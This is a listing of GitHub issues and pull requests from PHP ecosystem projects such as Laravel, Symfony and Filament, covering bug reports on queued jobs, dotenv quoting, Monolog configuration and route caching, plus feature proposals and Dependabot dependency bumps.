I have a model with a stale_since timestamp. When something changes the model, I set the model's stale_since to the current date and dispatch a job, which performs some calculations and clears stale_since. The job has ShouldBeUniqueUntilProcessing and WithoutOverlapping middleware, so there should be at most 2 instances of the job for a given model at a given point in time - 0..1 pending and 0..1 processing. A job dispatched after setting stale_since may ultimately not be run - it may be dropped by ShouldBeUniqueUntilProcessing because another job is pending for that model - but in that case the pending job should ultimately clear the model's stale_since.

(I'm aware there are at least 2 logical race conditions in what I'm describing. This is an oversimplification. All that matters is that the the final stale_since that gets set should be cleared by the final job that gets processed, even if that job was already pending when the final stale_since was set. 😄)

In 13.4.0 and earlier, this logic held.

However, after upgrading to 13.5.0, I've suddenly started seeing models with stale_since set long after they should have been cleared, with no jobs pending, and with no exceptions and no failed jobs logged. It seems the jobs were "lost" in the framework.

Downgrading to 13.4.0 immediately resolved the issue.

Patching 13.5.0 to revert #59567 also resolved the issue.

Steps To Reproduce

I've created a self-contained repro that sets up this exact scenario as simply as I can. It passes with 13.4.0, fails with 13.5.0, and passes with 13.5.0 patched to revert #59567:

https://github.com/nmbrcolin/repro-stale

View more
8 comments 👍 4
nmbrcolin

nmbrcolin

7th May 2026 @ 17:21

Description

When a recipe defines an environment variable whose value is wrapped in single quotes (e.g. to store a JSON array as a dotenv literal), the EnvConfigurator incorrectly wraps the value in double quotes and escapes the inner double quotes.

Steps to reproduce

Define the following in a recipe manifest:

"dotenv": {
  "dev": {
    "ALLOWED_LANGUAGES": "'[\"en\",\"de\",\"es\"]'"
  }
}

Expected result

ALLOWED_LANGUAGES='["en","de","es"]'

The dotenv format treats single-quoted values as fully literal strings — no variable interpolation, no escape sequences. This is the standard way to embed JSON content in a .env file.

Actual result

ALLOWED_LANGUAGES="'[\"en\",\"de\",\"es\"]'"

The value is wrapped in double quotes and the inner " are escaped, which changes the semantics: the single quotes become part of the value instead of acting as dotenv quoting delimiters.

Root cause

In EnvConfigurator::configureEnvDist(), a strpbrk check detects special characters (including ") and unconditionally wraps the value in double quotes:

if (false !== strpbrk($value, " \t\n&!\"")) {
    $value = '"'.str_replace(['\\', '"', "\t", "\n"], ['\\\\', '\\"', '\t', '\n'], $value).'"';
}

This was introduced in #200 to handle values containing spaces, newlines, and other shell-special characters. However, it does not account for values already wrapped in single quotes, which should be written as-is.

View more
DjLeChuck

DjLeChuck

25th Jun 2026 @ 08:23

Supersedes #12.

flare help fell through to Symfony's built-in HelpCommand, showing generic option docs instead of the Flare banner and command list, and dev commands (app:build, make:command, test) were leaking into the user-facing list. This replaces it with a custom HelpCommand that renders the banner + grouped flag docs + commands, hides the dev commands, and adds tests covering the output.

View more
mattiasgeniar

mattiasgeniar

24th Apr 2026 @ 07:30

Console Status: Needs Review

This PR introduces an interactive terminal stream engine to the QuestionHelper to natively support arrow-key navigation (left/right/up/down) and improve multi-byte character deletion within the autocomplete loop. It fixes several edge cases with cursor offsets when users edit strings in the middle of a question prompt.

View more
1 comment
ta2005

ta2005

10th Jul 2026 @ 17:01

When you have components which are attached to an incident, there is no way to update the status of them as part of a Record Update.

Incident is Fixed Image

Status of Components sill showing Problem

Image

No way to update the Status of Component from Update

Image

View more
6 comments
glipschitz

glipschitz

24th Jan 2025 @ 05:34

Summary

  • Adds ability to define validation contexts (e.g., store, update, import) that conditionally apply validation rules
  • All 85+ validation attributes now accept an optional context parameter
  • Includes comprehensive test coverage for variadic parameter extraction

Backwards Compatibility

This is a fully backwards-compatible, non-breaking change:

  • All validation attributes continue to work exactly as before without the context parameter
  • Rules without a context defined apply to all contexts (existing behavior preserved)
  • No existing method signatures have changed
  • The context parameter is optional on all attributes
  • Existing codebases require zero modifications to upgrade

Features

Context-specific validation rules:

class UserData extends Data
{
    public function __construct(
        #[Min(2)]
        public string $name,

        #[Email]
        public string $email,

        #[Min(8)]
        #[Confirmed]
        #[Required(context: 'store')] // Conditionally required only in 'store' context
        public ?string $password = null,

        public ?string $password_confirmation = null,
    ) {}
}

Controller integration with #[DataValidationContext]:

use Spatie\LaravelData\Attributes\DataValidationContext;

class UserController extends Controller
{
    #[DataValidationContext('store')]
    public function store(UserData $data): RedirectResponse
    {
        // Password is required and must be min 8 characters
    
        return redirect()->route('users.index')
            ->with('success', 'User created successfully.');
    }
    
    #[DataValidationContext('update')]
    public function update(UserData $data, User $user): RedirectResponse
    {
        // Password is optional - context-specific rules don't apply
    
        return redirect()->route('users.index')
            ->with('success', 'User updated successfully.');
    }
}

Multiple contexts per rule:

#[Required(context: ['store', 'import'])]
public ?string $email = null;

Fluent API:

UserData::withContext('store')->from($request);

Variadic rules with context:

#[In('draft', 'pending', context: 'store')]
#[In('published', 'archived', context: 'admin')]
public ?string $status = null;

You also have access to the string in your manual rules:

public static function rules(ValidationContext $context): array
{
    if ($context->contextName === 'store') {
        return [
            // Rules specific to the 'store' context
        ];
    }

    return [];
}

Test plan

  • ValidationContextManager singleton registration
  • Context setting, getting, and clearing
  • Rules without context apply to all contexts
  • Context-specific rules only apply in matching context
  • Array of contexts support
  • Fluent API with context restoration
  • Variadic parameter extraction for all rule types (ArrayType, In, NotIn, StartsWith, EndsWith, Mimes, etc.)

I'm open to discussions on the naming of things - i'm not 100% convinced myself there :)

View more
1 comment 👍 2
CWAscend

CWAscend

14th Feb 2026 @ 01:43

Documentation Status: Needs Review Feature LiveComponent
Q A
Bug fix? yes
New feature? yes
Deprecations? no
Documentation? yes
Issues Fix #1986
License MIT

Hello, as described in the Issue currently there is problem that if an request fails the js freezes. I looked into it and the issue is that there is currently no fetch.catch() to handle errors with the fetch itself. As far as can see currently the code only handles faulty responses.

This Pr add:

  • prevention of the Js freeze
  • showing the error message in the error model
  • add a new request:error hook to handle this kind off errors

The request:error hook works mostly like response:error, so to prevent the modal from showing up you can do this:

this.component.on('request:error', (component, requestData, controls) => {
        controls.displayError = false;
});

Steps to reproduce the Error

  1. Create a LiveComponent with an Input for example a select.
  2. Open the Page
  3. In the Browser Dev Tools go to the Network Tab and set throttling to offline
  4. Change the Input to trigger a Request
View more
1 comment
FabianKoehnen

FabianKoehnen

11th May 2026 @ 21:28

I am using a monolog service handler labeled db in my dev environment, but not in prod. When I try to run the app or a command in the prod environment I receive the error You have requested a non-existent service "monolog.handler.db". The error is resolved when I add the db handler to the prod monolog configuration.

It seems like this might be a bug when building the container where it does not ignore monolog handler services that are used in one environment, but not another.

In my specific case, I will be using the db handler on production, so I can work around this. But it seems like this might not be working as intended.

Here is the configuration that produced the error:

# config/packages/monolog.yaml
monolog:
    channels:
        - deprecation # Deprecations are logged in the dedicated "deprecation" channel when it exists

when@dev:
    monolog:
        handlers:
            db_filter:
                type: filter
                handler: db
                min_level: warning
            db:
                type: service
                id: App\Logging\Handler\DbHandler
            main_file:
                type: stream
                path: "%kernel.logs_dir%/%kernel.environment%.log"
                level: warning
                channels: ["!event"]
            info_filter:
                type: filter
                handler: info_file
                accepted_levels: ['info']
            info_file:
                type: stream
                path: "%kernel.logs_dir%/%kernel.environment%.info.log"
                channels: ['!event']
            debug_filter:
                type: filter
                handler: debug_file
                accepted_levels: ['debug']
            debug_file:
                type: stream
                path: "%kernel.logs_dir%/%kernel.environment%.debug.log"
                channels: ['!event']
            console:
                type: console
                process_psr_3_messages: false
                channels: ["!event", "!doctrine", "!console"]

when@prod:
    monolog:
        handlers:
            main:
                type: fingers_crossed
                action_level: error
                handler: nested
                excluded_http_codes: [404, 405]
                buffer_size: 50 # How many messages should be saved? Prevent memory leaks
            nested:
                type: stream
                path: php://stderr
                level: debug
                formatter: monolog.formatter.json
            console:
                type: console
                process_psr_3_messages: false
                channels: ["!event", "!doctrine"]
            deprecation:
                type: stream
                channels: [deprecation]
                path: php://stderr

Here is the exception:

AH01071: Got error 'PHP message: PHP Fatal error:  Uncaught Symfony\\Component\\DependencyInjection\\Exception\\ServiceNotFoundException: You have requested a non-existent service "monolog.handler.db". in /var/www/html/vendor/symfony/dependency-injection/ContainerBuilder.php:996
Stack trace:
#0 /var/www/html/vendor/symfony/dependency-injection/ContainerBuilder.php(1028): Symfony\\Component\\DependencyInjection\\ContainerBuilder->getDefinition()
#1 /var/www/html/vendor/symfony/monolog-bundle/DependencyInjection/Compiler/AddProcessorsPass.php(39): Symfony\\Component\\DependencyInjection\\ContainerBuilder->findDefinition()
#2 /var/www/html/vendor/symfony/dependency-injection/Compiler/Compiler.php(82): Symfony\\Bundle\\MonologBundle\\DependencyInjection\\Compiler\\AddProcessorsPass->process()
#3 /var/www/html/vendor/symfony/dependency-injection/ContainerBuilder.php(757): Symfony\\Component\\DependencyInjection\\Compiler\\Compiler->compile()
#4 /var/www/html/vendor/symfony/http-ker...
View more
👍 2
jdevinemt

jdevinemt

4th Mar 2022 @ 19:48

Documentation Status: Reviewed Feature Cropperjs
Q A
Bug fix? no
New feature? yes
Deprecations? no
Documentation? yes
Issues Fix #3394
License MIT

Resolves the indirect intervention/image v2 deprecations reported in #3394 by upgrading the dependency to v4, and adds the ability to choose the image driver (proposal/discussion in #3678).

What changes

  • intervention/image: ^2.5^4.0 (drops v2). The Crop model migrates to the v4 API: make()decodeBinary(), the resize(closure) aspect-ratio + upsize calls → scaleDown(), encode() + getEncoded()encodeUsingFileExtension(), and the type-hints move to ImageManagerInterface / ImageInterface.
  • Configurable image driver via a new bundle configuration:
# config/packages/cropperjs.yaml
cropperjs:
    driver: gd            # gd (default), imagick or vips
    driver_service: ~     # optional: a custom Intervention DriverInterface service (takes precedence)

The ImageManager is built through ImageManager::usingDriver(). gd / imagick are bundled with intervention/image; vips uses the official intervention/image-driver-vips package, declared under composer suggest (it needs libvips + ext-ffi). Selecting vips without that package fails fast at container compile time with an actionable message. driver_service lets advanced users inject a fully custom / pre-configured DriverInterface.

Backward compatibility

The bundle's public API is unchanged and gd remains the zero-config default, so existing apps behave exactly as before. The only requirement change is intervention/image v4 (PHP >= 8.3, already satisfied by the bundle's PHP >= 8.4 floor).

Tests

CropTest is parameterized over the gd and imagick drivers and now covers the crop region (locking the crop() argument order), setCroppedMaxSize() downscaling, thumbnail downscaling and output format. New ConfigurationTest and CropperjsExtensionTest cover the driver configuration, the custom-driver precedence and the fail-fast vips guard.

View more
1 comment
deluxetom

deluxetom

11th Jun 2026 @ 21:27

Minor Status: Needs Review
View more
1 comment
nicolas-grekas

nicolas-grekas

15th Jun 2022 @ 20:18

dependencies

Bumps word-wrap from 1.2.3 to 1.2.4.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot merge will merge this PR after your CI passes on it
  • @dependabot squash and merge will squash and merge this PR after your CI passes on it
  • @dependabot cancel merge will cancel a previously requested merge and block automerging
  • @dependabot reopen will reopen this PR if it is closed
  • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself) You can disable automated security fix PRs for this repo from the Security Alerts page.
View more
dependabot[bot]

dependabot[bot]

20th Jul 2023 @ 17:44

Changes In Code

Add custom CockroachSchemaManager extending the PostgreSQLSchemaManager and override the selectTableColumns() function to add the a.attisdropped = false flag to the SQL query.

Additionally override compileColumns function in CockroachGrammar-Class to fix the output of the Schema::getColumns function.

Issue ticket number / Business Case

https://github.com/ylsideas/cockroachdb-laravel/issues/35

Checklist before requesting a review

  • I have written PHP tests.
  • I have updated the documentation in the readme where needed.
  • I have checked code styles, PHPStan etc. pass.
  • I have provided an issue/business case.
View more
2 comments
Vision42

Vision42

12th Mar 2024 @ 07:38

Removes Rector rules that only fix 10 or fewer occurrences across the codebase, and applies the remaining ones.

View more
1 comment
lucasmichot

lucasmichot

6th Jul 2026 @ 16:06

enhancement

Contact Details

No response

Feature Title

Docker Support

Feature Description

I have a mostly working Docker setup on the chore/add_docker_support branch, with the only problem being that Laravel Reverb isn't working. (The console complains about not being able to connect via websockets)

Having docker support would make the software much more accessible, since having to setup Vanguard can be a pain with all the various services it needs. (Cron running, Reverb etc)

I would like to tackle this at some point, but if somebody wants to have a look and see if they can get it working, feel free! I'm certainly not a Docker expert.

Vanguard Version

v1.7.1

Current Issues

Hardship of installing Vanguard, it can be a pain.

Additional Context

No response

Resources

No response

View more
1 comment 👍 2
lewislarsen

lewislarsen

27th Aug 2024 @ 21:44

I configured the component group with "Folded in except for active incident". Then I created an incident for a component of that group, but the component group keeps folded in. I tried that in the current demo version too, there the component group keeps folded in too.

I used this commit:

commit 4ebeba11597f06fc38f30f8ff5992764fb6a2744 (HEAD -> 3.x, origin/HEAD, origin/3.x) Date: Fri Jan 31 08:08:25 2025 +0000

View more
2 comments
tgrymatt

tgrymatt

6th Feb 2025 @ 15:50

My composer.json:

{
  "require": {
    "php": "^8.4",
    "symfony/cache": "^7.2.9",
    "symfony/console": "^7.2.9",
    "symfony/dotenv": "^7.2.9",
    "symfony/serializer": "^7.2.9",
    "symfony/twig-bundle": "^7.2.9",
    "symfony/uid": "^7.2.8",
    "symfony/yaml": "^7.2.9"
  },
  "extra": {
    "symfony": {
      "require": "7.2.*"
    }
  }
}

Output of composer diagnose:

not relevant

When I run this command:

symfony composer outdated -m -D "symfony/*"     

I get the following output:

Color legend:
- patch or minor release available - update recommended
- major release available - update possible
symfony/cache               7.2.9  7.4.0  Provides extended PSR-6, PSR-16 (and tags) implementations
symfony/console             7.2.9  7.4.0  Eases the creation of beautiful and testable command line interfaces
symfony/debug-bundle        7.2.0  7.4.0  Provides a tight integration of the Symfony VarDumper component and the ServerLogCommand from MonologBridge into the Symfony full-stack framework
symfony/dotenv              7.2.9  7.4.0  Registers environment variables from a .env file
symfony/framework-bundle    7.2.9  7.4.0  Provides a tight integration between Symfony components and the Symfony full-stack framework
symfony/http-client         7.2.9  7.4.0  Provides powerful methods to fetch HTTP resources synchronously or asynchronously
symfony/property-access     7.2.9  7.4.0  Provides functions to read and write from/to an object or array using a simple string notation
symfony/property-info       7.2.9  7.4.0  Extracts information about PHP class' properties using metadata of popular sources
symfony/runtime             7.2.8  7.4.0  Enables decoupling PHP applications from global state
symfony/serializer          7.2.9  7.4.0  Handles serializing and deserializing data structures, including object graphs, into array structures or other formats like XML and JSON.
symfony/stopwatch           7.2.4  7.4.0  Provides a way to profile code
symfony/twig-bundle         7.2.9  7.4.0  Provides a tight integration of Twig into the Symfony full-stack framework
symfony/uid                 7.2.8  7.4.0  Provides an object-oriented API to generate and represent UIDs
symfony/web-profiler-bundle 7.2.9  7.4.0  Provides a development tool that gives detailed information about the execution of any request
symfony/yaml                7.2.9  7.4.0  Loads and dumps YAML files

And I expected this to happen:

I expect the version updates available to respect the actual updates for 7.2.* to be the listed versions

View more
11 comments
dsdeboer

dsdeboer

1st Dec 2025 @ 19:17

This is an automated pull request from Shift to update your package code and dependencies to be compatible with Laravel 11.x.

Before merging, you need to:

  • Checkout the l11-compatibility branch
  • Review all comments for additional changes
  • Thoroughly test your package

If you do find an issue, please report it by commenting on this PR to help improve future automation.

View more
2 comments
laravel-shift

laravel-shift

2nd Mar 2024 @ 15:30

Status: Needs Review Feature

Adds a multi-select component that displays selected options as removable badges, backed by a Stimulus controller and a hidden select multiple for standard form submission.

Relates to #3233

Q A
Bug fix? no
New feature? yes
Deprecations? no
Documentation? no
Issues #3233
License MIT

Adds a MultiSelect component to the shadcn kit. Selected options are displayed as removable badges inside the trigger. A hidden <select multiple> handles standard Symfony form submission.

Usage

<twig:MultiSelect name="fruits" placeholder="Select fruits...">
    <twig:MultiSelect:Option value="apple" label="Apple" />
    <twig:MultiSelect:Option value="banana" label="Banana" />
</twig:MultiSelect>
View more
1 comment ❤️ 1
KylianCodes

KylianCodes

1st May 2026 @ 09:02

Priority: P2 (High - Fix Soon)

Problem

The Incident model has both a persisted status column AND a computed latestStatus attribute that looks at the latest Update. This creates inconsistencies across the codebase:

  • Filament table (IncidentResource.php:127) displays latest_status
  • API resource (Incident.php:27) returns latestStatus
  • Filament filter (:165) filters on the raw status column
  • scopeUnresolved() (:170) queries the raw status column
  • Navigation badge (:246-250) tries to reconcile both by querying unresolved() (raw status) then re-filtering by latest_status

This means an incident marked "investigating" in the DB but with a "fixed" update will still appear in scopeUnresolved() scope queries but then get filtered out in the badge — causing an N+1-like post-filter on every page load.

Suggested Fix

Consider a status computed column or event-driven sync so that the persisted status always reflects the latest update. Alternatively, make scopeUnresolved() join the updates table (as Status.php already does).

View more
jbrooksuk

jbrooksuk

9th Mar 2026 @ 11:42

enhancement help wanted good first issue

using prompt engineering techniques provide enhancement to the Gemini service class in the Gemini prompt class, creating functions commonly used in Laravel applications.

View more
kwakuOfosuAgyeman

kwakuOfosuAgyeman

5th Jan 2025 @ 05:43

User-Level Custom Tags

We need the ability to add tags at the user level. These tags can be managed globally, which helps when registering an incident by allowing visibility of the incident only for certain tags.

The goal is to maintain a dynamic system status for specific tags. For example, we can create a tag as follows:

Tag

Name: Organization Value: Customs System

Even though our registered components are global for all our clients (organizations), not all of them are impacted by a given incident. For instance, if an API for a specific client is deployed in a particular AWS region, only that client will be affected. Therefore, incident registration and visibility should be restricted to users of that client.

View more
1 comment
jselvareef

jselvareef

27th Mar 2025 @ 16:13

Summary

When the entity name is provided as a command argument, MakeEntity::interact() returns early before reaching $this->checkIsUsingUid($input). The $usesUuid / $usesUlid flags are therefore never set, and the entity is always generated with an integer id — silently ignoring --with-uuid / --with-ulid.

# Before this PR: id is int, options silently ignored
php bin/console make:entity MyEntity --with-uuid

The fix moves the call to the top of interact(), which:

  • Matches the pattern already used in MakeUser::interact() and MakeResetPassword::interact().
  • Matches the docblock in UidTrait::checkIsUsingUid(): "Call this as early as possible in a maker's interact()."
  • Also surfaces the existing validation (mutually-exclusive --with-uuid / --with-ulid, missing symfony/uid) earlier in non-interactive flows.

Test plan

  • New regression test it_creates_a_new_class_with_uuid_when_name_is_passed_as_argument exercises make:entity User --with-uuid and asserts the generated entity uses Uuid + doctrine.uuid_generator.
  • PHP-CS-Fixer dry-run clean on touched files.
  • Existing UUID/ULID tests reach the same code paths as before.

Fixes #1789

View more
Amoifr

Amoifr

12th May 2026 @ 13:12

enhancement

Note: We are not looking for a community member to build this feature, it will be handled a member of the Filament core team when we have availability.

View more
2 comments
danharrin

danharrin

18th Apr 2026 @ 07:53

Feature

This pr. aim to resolve this https://github.com/symfony/webpack-encore-bundle/issues/10#issuecomment-436483015 and this https://github.com/symfony/webpack-encore-bundle/issues/10#issuecomment-490585553

Q A
Bug fix? no
New feature? yes
Doc updated no
BC breaks? no
Deprecations? yes
Tests pass? yes
Fixed tickets #10
License MIT

I'm not expert of PR, so sorry if I made mistakes in the process or in the code. But I will be happy to solve them in that case.

My problem was use csp-nonce in Symfony app when the nonce is generated from Nginx server. I started from master branch but he already had problems... I can solve them ?

Todo

WIP

View more
2 comments
BruceGitHub

BruceGitHub

14th Apr 2020 @ 16:35

dependencies php

Bumps spatie/laravel-openapi-cli from 1.3.0 to 1.3.1.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
dependabot[bot]

dependabot[bot]

28th Jun 2026 @ 10:12

Hello,

i have to handle log and use some tools like messenger system, doctrine, etc. When i handle log with an handler, it produce log (through messenger, doctrine, etc.), and go in an infinite loop.

Put conditions on channel or other parameters doesn't work because i want to send messenger, doctrine log of my main application to my jobqueue.

I just want to disable all log launch by my Handler, or set a configuration to my logger to know when it comes.

Thank you for your help.

View more
7 comments
c-lambert

c-lambert

4th Jun 2021 @ 07:24

Laravel Version

13.19.0

PHP Version

8.5

Database Driver & Version

No response

Description

File src/Illuminate/Http/Client/Factory.php, method psr7Response(). https://github.com/laravel/framework/commit/db427e6f240c60f2a2f5238156462ea8562c4ef9#diff-7e12e819391f6a1bb91c168b6c563f50211ef1c84944dcdbabbe0dbb2a2d94b0R192-R194 There is new condition

if (! is_string($body) && ! is_null($body)) {
  throw new InvalidArgumentException('HTTP fake response body must be a string, array, or null.');
}

This condition causes exception for body of StreamInterface type. Guzzle Response accepts StreamInterface. https://github.com/guzzle/psr7/blob/2.12/src/Response.php

Is it intended behavior, is there are related changes coming in guzzle?

Steps To Reproduce

This code leads to HTTP fake response body must be a string, array, or null. exception instead of response dump as it was before.

$resource = fopen('php://temp', 'w+');
fputs($resource, 'Some data I want to check later');
rewind($resource);
\Http::fake(['file-download.com' => fn() => \Http::response(new \GuzzleHttp\Psr7\Stream($resource))]);
$response = \Http::createPendingRequest()->send('GET', 'file-download.com');
dd($response);
View more
frolovk1307

frolovk1307

10th Jul 2026 @ 09:54

If I am using the docker setup for mercure and try to gain a massive set of data the result I get from mercure is limited to 1000 events.

This is not limited by the history because the history is infinite. So no data is cleared. I can access via a last event id older data as well.

Is there a limitation that you can adjust or a reason why mercure is giving me only 1000 events? In my case it is possible to retreive way more than 1000 events form mercure and I have to work around to get all data by resubscribing to mercure with a new message id because otherwise I will only have the 1000 results and the rest is missing or comes with the next update of the mercure topic.

View more
Pascal-Meinecke

Pascal-Meinecke

23rd Apr 2024 @ 13:42

According to the documentation, a custom callback can be passed to the Encore.configureFontRule() and Encore.configureImageRule() functions: https://github.com/symfony/webpack-encore/blob/main/index.js#L1457.

However, when using this callback to specify a custom generator, the filename option of the generator seems to get ignored:

Encore
    .configureFontRule(rule => {
        rule.test = fontFileExtensionRegex;
        rule.generator = {
            filename: 'whatever/path/[name][ext]',
        };
    });

The issue seems to be this default filename option: https://github.com/symfony/webpack-encore/blob/main/lib/WebpackConfig.js#L78.

Using the same example, explicitly setting filename to global.undefined in the regular options seems to fix the issue:

Encore
    .configureFontRule(
        {
            filename: global.undefined,
        },
        rule => {
            rule.test = fontFileExtensionRegex;
            rule.generator = {
                filename: 'whatever/path/[name][ext]',
            };
        },
    );
View more
9 comments
egonolieux

egonolieux

1st Sep 2023 @ 14:19

When using webpack encore, a known issues is that the css file leaflet/dist/leaflet.min.css does nos exists (and does only in jsDelivr used by the Asset Mapper component).

Is has been referenced as a known issue, and the solution is really simple: Add an alias for the file in the webpack config https://github.com/symfony/ux/blob/2.x/src/Map/src/Bridge/Leaflet/README.md#unable-to-find-leafletdistleafletmincss-file-when-using-webpack-encore

I think this should be part of the recipe since the file never existed in the npm package and would be a nicer developper experience having the package work right after the installation

The following line should be added automatically by the recipe

// webpack.config.js
// ...
// uncomment if you're having problems with a jQuery plugin
//.autoProvidejQuery()

.addAliases({'leaflet/dist/leaflet.min.css': 'leaflet/dist/leaflet.css'})
View more
jonathan-stimactiv

jonathan-stimactiv

25th Mar 2026 @ 10:22

From the docs, it says that the server is to be configured from a "config/packages/mercure.php" file. I imagine this file will need to be booted by the symfony framework, which my project doesn't have. My own project uses a Roadrunner server, and they provide a configuration entry for triggering setup of a websocket server. I imagine it'll be convenient if there is a way to pass the roadrunner websocket url to the symfony mercure library, but without the symfony framework. Kindly correct my expected flow if it's wrong but these are the variables available to me

View more
2 comments
nmeri17

nmeri17

11th Jan 2023 @ 18:32

The version links in docs/requirements.md still pointed at the old docs.spatie.be host. Point them at spatie.be/docs like the rest of the package docs.

Fixes #1464

View more
1 comment
lazerg

lazerg

9th Jul 2026 @ 14:10

Platform Feature Status: Reviewed
Q A
Bug fix? no
New feature? yes
Docs? yes
Issues Fix #2194
License MIT

Follow-up to #2276, which exposed the raw streamed finish_reason for the OpenAI-compatible bridges only.

  • Adds FinishReason\FinishReason + FinishReason\FinishReasonCase, normalizing the divergent provider vocabularies (length / max_tokens / MAX_TOKENS / max_output_tokens) into STOP, LENGTH, TOOL_CALL, CONTENT_FILTER, STOP_SEQUENCE, OTHER while getRaw() keeps the provider value.
  • Exposes it as finish_reason result metadata for buffered and streamed results across OpenAI, Anthropic, Gemini, VertexAI, Bedrock, Azure, Ollama, Cohere, Mistral, DeepSeek, Cerebras, Scaleway, Docker Model Runner, Perplexity, MiniMax, amazee.ai and Generic.
  • Streams now emit the reason as the final MetadataDelta, after the deltas of the chunk that carried it (providers such as Mistral bundle the last content token with finish_reason).
$finishReason = $result->getMetadata()->get('finish_reason');

if ($finishReason?->is(FinishReasonCase::LENGTH)) {
    // truncated by the output token limit
}

Docs in docs/components/platform.rst, runnable example in examples/misc/finish-reason.php.

Known gap: the OpenAI Responses API signals a truncated stream with response.incomplete, which the bridge raises as an exception, so there is no result left to carry the reason. Left as-is; changing it is a behavior change beyond this PR.

View more
🎉 2
chr-hertel

chr-hertel

9th Jul 2026 @ 01:35

Laravel Version

13.19.0

PHP Version

8.4.23

Database Driver & Version

N/A (not database-related)

Description

RouteCacheCommand calls prepareForSerialization() directly on route instances returned from getFreshApplicationRoutes().

https://github.com/laravel/framework/blob/3093ff3a61f88225f16fec35dda65e1e7c0867a4/src/Illuminate/Foundation/Console/RouteCacheCommand.php#L56-L64

Route::prepareForSerialization() intentionally removes runtime dependencies: https://github.com/laravel/framework/blob/3093ff3a61f88225f16fec35dda65e1e7c0867a4/src/Illuminate/Routing/Route.php#L1560

Those route objects remain referenced by the live router collection. Later in the same PHP process, any code that still needs to analyze routes can fail with:

LogicException: Route is not bound.

This happens because after container is unset. Access like $route->container goes through __get(): https://github.com/laravel/framework/blob/3093ff3a61f88225f16fec35dda65e1e7c0867a4/src/Illuminate/Routing/Route.php#L1569-L1573 which calls parameters(): https://github.com/laravel/framework/blob/3093ff3a61f88225f16fec35dda65e1e7c0867a4/src/Illuminate/Routing/Route.php#L432-L435 And that throws when the route was never bound to a request: https://github.com/laravel/framework/blob/3093ff3a61f88225f16fec35dda65e1e7c0867a4/src/Illuminate/Routing/Route.php#L483-L490

This is especially visible with php artisan optimize, which runs built-in cache commands before ServiceProvider::$optimizeCommands:

[
    'config' => 'config:cache',
    'events' => 'event:cache',
    'routes' => 'route:cache',
    'views' => 'view:cache',
    ...ServiceProvider::$optimizeCommands,
]

If a package registers an optimize task that analyzes routes (for example, to cache generated metadata), that task can fail after route:cache has already run in the same optimize command.

Steps To Reproduce

Reproduction repository: https://github.com/hosni/laravel-optimize-command-bug

  1. Clone the reproduction repository:
git clone https://github.com/hosni/laravel-optimize-command-bug.git
cd laravel-optimize-command-bug
composer install
cp .env.example .env
php artisan key:generate
  1. The app registers a custom optimize command via AppServiceProvider:
$this->optimizes(
    optimize: 'test:route-analysis',
    key: 'route-analysis',
);
  1. The test:route-analysis command iterates all routes and analyzes them:
foreach (Route::getRoutes() as $route) {
    dump($route->uri(), $route->getController(), $route->gatherMiddleware());
}
  1. Run the command directly — it succeeds:
php artisan test:route-analysis
  1. Run it as part of optimize — it fails:
php artisan optimize

Expected: optimize completes successfully, including the route-analysis task.

Actual: The route-analysis task fails with:

LogicException: Route is not bound.

The failure occurs on any route when gatherMiddleware() is called after route:cache has already executed in the same process.

Workaround:

php artisan optimize --except=route-analysis
php artisan test:route-analysis

Proposed fix: Clone each route before calling prepareForSerialization(), and build the route cache file from the cloned/prepared collection so live route instances are not mutated.

View more
hosni

hosni

13th Jul 2026 @ 14:43

dependencies

Bumps dependabot/fetch-metadata from 2.4.0 to 3.1.0.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
dependabot[bot]

dependabot[bot]

27th May 2026 @ 22:10

Hi,

This is using Laravel v11, Carbon v3 and short-url v8.1.2

I am using the default factories in my test but when I create an inactive short url using the inactive() factory state and test getting the short url it returns a 500 type error. It seems this is because the Carbon\Carbon::isBefore() only allows a DateInterface or string and not null.

I have just upgraded to Laravel 11 which is now including Carbon v3 instead of v2.

TypeError: Carbon\Carbon::isBefore(): Argument #1 ($date) must be of type DateTimeInterface|string, null given, called in /my-app/vendor/ashallendesign/short-url/src/Classes/Resolver.php on line 59 and defined in /my-app/vendor/nesbot/carbon/src/Carbon/Traits/Comparison.php:239
use AshAllenDesign\ShortURL\Models\ShortURL;

it('returns 404 for inactive url', function () {
    $inactiveShortURL = ShortURL::factory()->inactive()->create();

    get(config('short-url.prefix').'/'.$inactiveShortURL->url_key)
        ->assertStatus(404);
});

This calls the class Resolver.php and fails on line 59:

if (now()->isBefore($shortURL->activated_at)) {
        return false;
}
View more
1 comment
chrisrhymes

chrisrhymes

13th Nov 2024 @ 09:51

good first issue hacktoberfest

